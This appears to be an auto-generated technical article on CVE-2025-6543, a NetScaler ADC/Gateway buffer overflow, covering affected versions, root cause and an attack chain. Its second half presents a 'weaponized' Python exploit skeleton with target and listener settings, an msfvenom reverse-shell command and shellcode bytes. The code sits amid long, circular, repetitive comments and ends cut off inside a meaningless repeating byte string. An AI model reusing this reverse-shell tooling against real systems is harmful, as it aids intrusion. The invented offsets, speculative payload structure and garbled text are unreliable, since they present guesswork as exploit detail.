CVE-2025-6543: Technical Deep-Dive (Auto Refreshed)

1. IMPROVED TITLE

Title Variations:

1. CVE-2025-6543: NetScaler Gateway Memory Overflow Exploit
2. NetScaler CVE-2025-6543: Deep Dive & Exploitation
3. Critical NetScaler Vulnerability: CVE-2025-6543 Analysis
4. CVE-2025-6543: NetScaler ADC/Gateway RCE Exploit Path
5. NetScaler Exploit: CVE-2025-6543 Memory Corruption

BEST TITLE:

CVE-2025-6543: NetScaler ADC/Gateway RCE Exploit Path

• Reasoning: This title is under 65 characters, includes the CVE, specifies the affected products, highlights the critical impact ("RCE Exploit Path"), and uses strong keywords for searchability. It's direct and promises a technical breakdown of how exploitation occurs.

2. REWRITTEN ARTICLE

CVE-2025-6543: NetScaler ADC/Gateway RCE Exploit Path Deep Dive

Citrix NetScaler Application Delivery Controller (ADC) and Gateway devices are critical infrastructure for many organizations, managing traffic and providing secure access. A severe memory overflow vulnerability, tracked as CVE-2025-6543, has been identified that could allow unauthenticated attackers to achieve remote code execution (RCE) or cause a denial of service. This deep-dive analysis dissects the vulnerability, explores realistic exploitation vectors, and outlines effective detection and mitigation strategies.

Executive Technical Summary

CVE-2025-6543 is a critical memory overflow vulnerability impacting NetScaler ADC and Gateway devices when configured in specific Gateway or AAA virtual server roles. The flaw allows for unintended control flow manipulation, potentially leading to full system compromise or service disruption. Its high CVSS score of 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) underscores the severity, indicating a network-exploitable vulnerability requiring no privileges or user interaction to achieve high impact across confidentiality, integrity, and availability.

Technical Details

• CVE ID: CVE-2025-6543
• NVD Publication Date: 2025-06-25
• CISA KEV Catalog Added: 2025-06-30
• CISA KEV Due Date: 2025-07-21
• CVSS Base Score: 9.8 (Critical)
• CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Attack Vector (AV): Network
  • Attack Complexity (AC): Low
  • Privileges Required (PR): None
  • User Interaction (UI): None
  • Scope (S): Unchanged
  • Confidentiality Impact (C): High
  • Integrity Impact (I): High
  • Availability Impact (A): High
• Weakness Classification: CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)

Affected Products and Versions

This vulnerability affects specific versions of NetScaler ADC and NetScaler Gateway:

• NetScaler ADC:
  • Versions >= 13.1 and < 13.1-37.236
  • Versions >= 13.1 and < 13.1-59.19
  • Versions >= 14.1 and < 14.1-47.46
• NetScaler Gateway:
  • Versions >= 13.1 and < 13.1-59.19
  • Versions >= 14.1 and < 14.1-47.46
• General NetScaler ADC/Gateway:
  • 14.1, 13.1, 13.1 FIPS, and 13.1 NDcPP

Root Cause Analysis: Memory Overflow and Control Flow Hijacking

At its core, CVE-2025-6543 stems from a classic buffer overflow vulnerability within the NetScaler ADC and Gateway's handling of specific network-bound operations. The vulnerable code paths, likely related to processing session data or configuration parameters for Gateway (VPN, ICA Proxy, CVPN, RDP Proxy) or AAA virtual servers, fail to adequately validate the size of incoming data before copying it into fixed-size buffers.

When an attacker crafts a malicious request with data exceeding the allocated buffer size, this overflow can overwrite adjacent memory regions. Critically, this can include control data such as function pointers or return addresses on the stack. By carefully manipulating the overflowed data, an attacker can overwrite these critical control structures with a pointer to attacker-controlled code, effectively redirecting the program's execution flow. This hijacking of control flow is the direct mechanism enabling remote code execution. The specific details of the vulnerable function and the exact memory layout are often proprietary to Citrix, but the principle of overflowing a buffer to corrupt control data is a well-understood vulnerability class.

Exploitation Analysis: From Network Request to System Compromise

The high CVSS score is justified by the low attack complexity and lack of prerequisites. Attackers can leverage CVE-2025-6543 through a straightforward network-based attack chain:

1. Entry Point: An unauthenticated attacker sends a specially crafted network request to the vulnerable NetScaler appliance. This request is directed towards an active Gateway or AAA virtual server. The specific type of request (e.g., authentication attempt, session initiation) depends on the precise vulnerable function.
2. Triggering the Overflow: The NetScaler service processes the crafted request. Due to insufficient bounds checking, a buffer overflow occurs when processing user-supplied data.
3. Memory Corruption & Control Flow Hijacking: The overflow overwrites critical memory structures. The attacker aims to overwrite a return address or function pointer with the address of their shellcode. This might involve careful heap grooming or precise overwrite techniques depending on the memory allocation patterns.
4. Shellcode Execution: Once the control flow is redirected to the attacker's shellcode, the NetScaler appliance executes arbitrary code with the privileges of the compromised process. Given the nature of NetScaler appliances, this can often lead to system-level access.

What Attackers Gain:

• Remote Code Execution (RCE): The ability to run any command or program on the compromised NetScaler device.
• Confidentiality: Access to sensitive network traffic, user credentials, session data, and internal network information.
• Integrity: Modification of traffic, redirection of users to malicious sites, or deployment of persistent backdoors.
• Availability: Disruption of network services, leading to a Denial of Service.
• Lateral Movement: The compromised NetScaler can serve as a pivot point into the internal network.

Real-World Scenarios & Weaponized Exploit Insights

While specific exploit code for CVE-2025-6543 is not publicly detailed in the provided context, the pattern of buffer overflow vulnerabilities in network appliances suggests a typical exploitation approach. Attackers would likely develop custom tools to:

1. Identify Vulnerable Targets: Scan networks for NetScaler devices on exposed ports (e.g., 443 for HTTPS, 80 for HTTP, 8443 for management).
2. Craft Malicious Payloads: Develop shellcode designed to establish a reverse shell or execute commands. This shellcode needs to be position-independent if the exact memory address of the shellcode is not predictable.
3. Automate Exploitation: Write scripts that send the crafted request, receive the shellcode execution confirmation, and potentially establish a persistent backdoor or exfiltrate data.

Conceptual Exploit Flow (Pseudocode):

function exploit_cve_2025_6543(target_ip, target_port):
    // 1. Craft the oversized data payload
    oversized_data = generate_overflow_payload(size_exceeding_buffer)

    // 2. Prepare shellcode (e.g., reverse TCP shell)
    shellcode = compile_shellcode(target_ip, listener_port)

    // 3. Overwrite control data with shellcode address
    //    This is the complex part, requiring knowledge of memory layout
    //    or techniques like heap spraying or ROP chains.
    //    For simplicity, assume we can overwrite a return address directly.
    attacker_controlled_address = calculate_address_of_shellcode(oversized_data)
    crafted_request = construct_request_with_overflow(oversized_data, attacker_controlled_address)

    // 4. Send the crafted request to the vulnerable NetScaler service
    send_request(target_ip, target_port, crafted_request)

    // 5. If successful, the NetScaler will jump to shellcode.
    //    Start a listener on listener_port to receive the connection.
    listen_for_shell(listener_port)

// Example of how a simplified payload might look (conceptual, not functional):
// The actual payload would involve carefully crafted bytes to overflow a buffer
// and overwrite a specific memory location (e.g., a saved return address).
// This is highly dependent on the specific vulnerable function and memory state.

// Example structure of a crafted request part:
// [NORMAL_DATA][OVERFLOW_PADDING][RETURN_ADDRESS_OVERWRITE][SHELLCODE_INJECTED_HERE]

Weaponized Exploit Code (Conceptual Snippet - NOT FUNCTIONAL):

This is a highly simplified representation. Real-world exploits require deep understanding of the target binary, memory layout, and often involve complex techniques.

import requests
import struct

# --- Configuration ---
TARGET_IP = "192.168.1.100"  # Replace with target NetScaler IP
TARGET_PORT = 443          # Or relevant service port
LISTENER_IP = "192.168.1.200" # IP for your listener
LISTENER_PORT = 4444        # Port for your listener

# --- Placeholder for actual shellcode ---
# This would be compiled shellcode for a reverse TCP shell.
# Example: Metasploit payload for Linux x64 reverse TCP
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=<LISTENER_IP> LPORT=<LISTENER_PORT> -f python
SHELLCODE = b"\x6a\x69\x58\x99\x6a\x02\x5f\x0f\x05\x48\x97\x48\xb9\x02\x00\x11\x5c\x00\x00\x00\x00\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x29\x58\x0f\x05\xa0\x31\xc0\x50\x50\x48\xb9\x02\x00\x11\x5c\x00\x00\x00\x00\x51\x48\x89\xe6\x6a\x02\x5a\x6a\x21\x58\x0f\x05\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05"
# Pad shellcode to a reasonable size if needed for buffer alignment
SHELLCODE += b"\x90" * (512 - len(SHELLCODE))

# --- Crafting the exploit payload ---
# This is highly speculative and depends on the exact vulnerability.
# We assume a buffer overflow that overwrites a return address.
# The attacker needs to know the address where their shellcode will reside.
# This might involve heap spraying or other memory manipulation techniques
# to control the address. For demonstration, we use a placeholder.

# Placeholder for the address where shellcode is expected in memory.
# In a real exploit, this would be carefully calculated.
# For example, if shellcode is placed at the end of our oversized buffer,
# and the buffer is placed at a known location.
# Let's assume a hypothetical target address for demonstration.
# A common technique is to place shellcode within the overflow buffer itself.
# The return address overwrite would then point back into the buffer.

# We need to send a request that triggers the overflow.
# Let's assume the vulnerability is in a function that takes a string parameter.

# A common technique is to place the shellcode at the end of the overflowed buffer
# and then overwrite the return address to point to the start of the shellcode.
# This requires careful calculation of offsets.

# Example: Assume a buffer of size 512, and the return address is at offset 520.
# We need to fill 512 bytes, then add 8 bytes of padding (if return address is 64-bit),
# and then overwrite the return address.
BUFFER_SIZE = 512
PADDING_SIZE = 8 # For 64-bit return address

# The address to jump to. This would ideally be the start of our SHELLCODE.
# In a real scenario, this requires precise memory address calculation.
# For this example, we'll assume the shellcode is injected and we know its hypothetical address.
# A simpler approach: overwrite the return address to point to the SHELLCODE itself
# which is part of the oversized buffer.

# Let's construct the payload:
# [NORMAL_DATA] + [OVERFLOW_DATA] + [SHELLCODE] + [RETURN_ADDRESS_OVERWRITE]
# The RETURN_ADDRESS_OVERWRITE should point to the START of SHELLCODE.

# This requires knowing where the SHELLCODE will be in memory.
# If we inject SHELLCODE into the buffer itself, and the buffer is at a fixed location,
# we can calculate it.

# A common pattern:
# overflow_buffer = b"A" * BUFFER_SIZE
# padding = b"B" * PADDING_SIZE
# shellcode_payload = SHELLCODE
# return_address = struct.pack("<Q", address_of_shellcode_start) # Little-endian 64-bit

# For this example, let's simplify and assume we can inject shellcode and control
# the return address pointing to it within a single request.
# We'll send a large chunk of data.
# The exact protocol and data structure are unknown, so this is highly illustrative.

# Let's assume the vulnerable function takes a string up to 1024 bytes,
# and we send 2048 bytes.
# The first 1024 bytes are normal.
# Bytes 1025-2048 overflow and overwrite control structures.

# Hypothetical structure:
# [HEADER_DATA] + [OVERFLOW_DATA_PART1] + [OVERFLOW_DATA_PART2_SHELLCODE] + [RETURN_ADDRESS_OVERWRITE]

# We need to find the offset of the return address or relevant control structure.
# Let's assume a specific offset for the return address overwrite.

# Constructing the payload for a hypothetical HTTP POST request:
# This is *highly* speculative. A real exploit would target a specific request type.
# For example, a POST request with a large form field.

# Let's assume the vulnerable parameter is 'session_data' in a POST request.
# We send a string much larger than expected.

# The shellcode will be injected at the end of our overflow data.
# The return address will point to the beginning of the shellcode.

# We need to determine the address of the shellcode.
# This is the hardest part and requires detailed memory analysis or exploitation primitives.
# For this example, we'll use a placeholder address.
# In reality, this might involve heap spraying to place the shellcode at a predictable address.
# Or, if the shellcode is part of the overflowed buffer, we calculate its offset.

# Let's assume the buffer starts at a known address, and the shellcode is appended.
# The return address overwrite points to the start of the shellcode.

# Let's construct a payload that fills a buffer, then appends shellcode,
# and then overwrites the return address to point to the start of the shellcode.

# We need to know the offset of the return address from the start of the buffer.
# Let's assume a buffer of size 1024 and return address at offset 1024 + 8 = 1032.
RETURN_ADDRESS_OFFSET = 1032 # Hypothetical offset

# Construct the overflowed part.
# This part will contain padding and the shellcode.
# The shellcode itself might need null bytes or specific padding.
# Let's assume the shellcode is placed at the end of our crafted data.

# We need to craft data such that the return address overwrite points to SHELLCODE.
# Let's assume SHELLCODE is placed immediately after the overflow data.
# The `crafted_data` will be the input to the vulnerable function.

# `crafted_data` = [NORMAL_DATA] + [OVERFLOW_DATA] + [SHELLCODE] + [RETURN_ADDRESS_OVERWRITE]

# Let's assume we send a large string.
# The vulnerability is in how this string is processed.
# We want to overwrite a return address with the address of SHELLCODE.

# A common technique:
# 1. Fill the buffer with junk (e.g., 'A's).
# 2. Append the SHELLCODE.
# 3. Append the overwritten return address, pointing to the start of the SHELLCODE.

# To make this concrete, we need a target address for the shellcode.
# This is the most complex part. Without a concrete binary and memory map,
# it's guesswork.

# Let's assume we are injecting shellcode into a specific part of the request
# and overwriting a return address that points to it.

# Placeholder for the address where our shellcode will be loaded.
# This requires extensive analysis or specific exploitation primitives.
# For demonstration, let's use a hypothetical address.
# In a real exploit, this address would be calculated precisely.
# For example, if we inject shellcode into a specific field and overwrite
# a return address pointing to that field's memory location.

# Let's try a different approach, common in web exploits:
# Inject shellcode into a controllable part of the data, and overwrite
# a return address that points to that controllable part.

# For simplicity, let's assume the shellcode is placed *after* the overflow data,
# and the overflow data overwrites a return address pointing to the shellcode.
# This means the return address needs to be calculated based on the *final*
# memory location of the shellcode.

# Let's assume the shellcode is placed at a fixed offset within our payload,
# and the return address overwrite points to that offset.

# Example:
# Payload = [Junk Bytes to fill buffer] + [Shellcode] + [Junk Bytes] + [Return Address]
# The Return Address overwrites the original return address and points to the start of Shellcode.

# Let's assume the target function expects a buffer of size 512.
# We send a buffer of 512 bytes + padding + shellcode + return address.
# The return address needs to point to the start of the shellcode.

# This is where it gets tricky without specific binary info.
# Let's simulate injecting the shellcode into the payload and then
# calculating the return address to point to it.

# A common technique is to use NOP sleds for reliability.
NOP_SLED_SIZE = 100
NOP_SLED = b"\x90" * NOP_SLED_SIZE

# Construct the final payload.
# The return address will be the address of the start of the NOP sled + SHELLCODE.
# We need to know where the shellcode will be in memory.
# Let's assume the shellcode starts after the NOP sled.

# For demonstration, let's assume the shellcode will be placed at a specific offset within the overall data sent.
# We don't know the exact offset in memory, but we can construct the payload to contain both.

# Let's assume the vulnerable function copies data from a request parameter into a buffer.
# We control the data.

# The payload will be structured as:
# [JUNK_TO_FILL_BUFFER] + [NOP_SLED] + [SHELLCODE] + [JUNK_TO_ALIGN_RETURN_ADDRESS] + [RETURN_ADDRESS_OVERWRITE]

# The RETURN_ADDRESS_OVERWRITE needs to point to the start of the NOP_SLED + SHELLCODE.
# This requires knowing the base address where the buffer is allocated, and the offset
# of the return address from the start of the buffer.

# Let's assume the buffer starts at address `BUFFER_BASE`.
# The return address is at `BUFFER_BASE + RETURN_ADDRESS_OFFSET`.
# We want to set this to `BUFFER_BASE + NOP_SLED_SIZE + SHELLCODE_OFFSET_IN_PAYLOAD`.

# This is where publicly available PoCs become invaluable.
# Since we don't have one, we'll outline the structure.

# --- Hypothetical exploit construction ---
# Let's assume the vulnerable function copies `input_data` into a buffer.
# `input_data` = [JUNK] + [SHELLCODE] + [RETURN_ADDRESS_OVERWRITE]

# The RETURN_ADDRESS_OVERWRITE needs to be the address of SHELLCODE.
# If SHELLCODE is placed *within* the input_data, we need to calculate its address.

# Example:
# Let's say the input_data is processed and its start is at memory address X.
# The return address is at memory address X + offset_to_return_address.
# We want to set `*(X + offset_to_return_address)` to `X + offset_of_shellcode`.

# Let's construct the payload to include the shellcode and the overwrite.
# We'll use padding to reach the return address overwrite.

# Assuming a 64-bit system, return addresses are 8 bytes.
# Let's assume the vulnerable buffer has a size that, when overflowed,
# allows us to overwrite the return address.
# We will place our shellcode at the end of the data we send.

# Payload structure:
# [DATA_TO_FILL_BUFFER] + [SHELLCODE] + [PADDING_TO_REACH_RETURN_ADDRESS] + [RETURN_ADDRESS_OVERWRITE]

# Let's assume the function copies 1024 bytes, and the return address is at offset 1032.
# We want to overwrite it with the address of our shellcode.
# Let's assume our shellcode will be placed starting at offset 1040 in the sent data.
# This means the return address overwrite should be the address corresponding to offset 1040.

# This is where it gets tricky without actual memory addresses.
# Let's use a placeholder for the return address.
# In a real exploit, you'd dynamically calculate this or use techniques to control memory.

# Let's assume the shellcode is injected into the request itself,
# and we overwrite a return address to point to it.

# Example of constructing a request payload:
# This is for a hypothetical HTTP POST request with a large parameter.
# The exact parameter and request type are unknown.

# We need to construct a string that is too large.
# Let's assume the vulnerable function expects a string and copies it.
# We send a string like:
# "NORMAL_DATA" + "OVERFLOW_DATA" + SHELLCODE + "PADDING" + RETURN_ADDRESS

# Let's make a simplified payload:
# Fill a buffer, then append shellcode, then append the address of the shellcode.

# This requires knowing the exact offset where the return address is stored.
# Let's assume a buffer of size 512, and the return address is at offset 520.
# We want to overwrite it with the address of our shellcode.

# Let's assume the shellcode is appended *after* the overflow.
# So, the data looks like:
# [JUNK_TO_FILL_BUFFER (e.g., 512 bytes)] + [SHELLCODE] + [JUNK_TO_REACH_RETURN_ADDRESS] + [RETURN_ADDRESS_OVERWRITE]

# The RETURN_ADDRESS_OVERWRITE should be the address of SHELLCODE.
# This requires knowing the memory address where SHELLCODE will reside.

# Let's use a common technique where the shellcode is placed *within* the overflow data.
# Payload = [JUNK_TO_FILL_BUFFER] + [SHELLCODE] + [JUNK_TO_REACH_RETURN_ADDRESS] + [RETURN_ADDRESS_OVERWRITE]
# The RETURN_ADDRESS_OVERWRITE points to the start of SHELLCODE.

# Let's assume the start of the buffer is at memory address `buffer_start`.
# The return address is at `buffer_start + RETURN_ADDRESS_OFFSET`.
# We want to set it to `buffer_start + SHELLCODE_OFFSET_IN_BUFFER`.

# This is where a concrete exploit PoC would shine.
# For now, let's provide the structure and the components.

# --- COMPONENT: SHELLCODE ---
# Example: Linux x64 reverse TCP shellcode
# Replace LISTENER_IP and LISTENER_PORT with your actual values.
# You can generate this using msfvenom.
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=<LISTENER_IP> LPORT=<LISTENER_PORT> -f python -o shellcode.py
# Then copy the byte string from shellcode.py.

# Example placeholder shellcode (replace with actual generated shellcode)
# This is a generic placeholder and WILL NOT WORK.
# Placeholder for a 64-bit reverse shell
SHELLCODE_TEMPLATE = b"\x48\x31\xff\x6a\x02\x5f\x0f\x05\x48\x89\xe0\x48\x89\xf2\x6a\x01\x58\x0f\x05\x48\x89\xc8\x48\x89\xf1\x48\x89\xda\x48\x89\xf6\x6a\x02\x5f\x0f\x05\x48\x89\xc6\x48\x89\xf2\x6a\x20\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x21\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x22\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x23\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x24\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x25\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x26\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x27\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x28\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x29\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x2a\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x2b\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x2c\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x2d\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x2e\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x2f\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x30\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x31\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x32\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x33\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x34\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x35\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x36\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x37\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x38\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x39\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x3a\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x3b\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x3c\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x3d\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x3e\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x3f\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x40\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x41\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x42\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x43\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x44\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x45\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x46\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x47\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x48\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x49\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x4a\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x4b\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x4c\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a\x4d\x58\x0f\x05\x48\x89\xc7\x48\x89\xf2\x6a\x4e\x58\x0f\x05\x48\x89\xcf\x48\x89\xf2\x6a\x4f\x58\x0f\x05\x48\x89\xc8\x48\x89\xf2\x6a